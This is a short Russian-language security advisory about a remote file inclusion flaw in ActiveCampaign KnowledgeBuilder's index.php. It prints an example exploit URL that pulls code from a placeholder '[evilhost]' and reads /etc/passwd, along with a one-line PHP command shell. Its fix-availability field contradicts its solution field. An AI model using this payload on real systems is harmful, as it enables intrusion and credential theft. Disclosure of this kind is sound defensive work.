Дата публикации: | 30.12.2003 |
Всего просмотров: | 977 |
Опасность: | Высокая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | ActiveCampaign KnowledgeBuilder |
Уязвимые версии: KnowledgeBuilder
Описание: Уязвимость обнаружена в KnowledgeBuilder. Удаленный пользователь может выполнить команды операционной системы на целевой системе. Программа не проверяет правильность данных, представленных в переменной 'page' в сценарии 'index.php'. Пример: http://[target]/kb/index.php?page=http://[evilhost]/index&cmd=cat%20/etc/passwd ----index.php---- <? system($cmd); ?> ----------------- URL производителя: http://www.activecampaign.com/kb/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | Remote Code Execution in Knowledge Builder |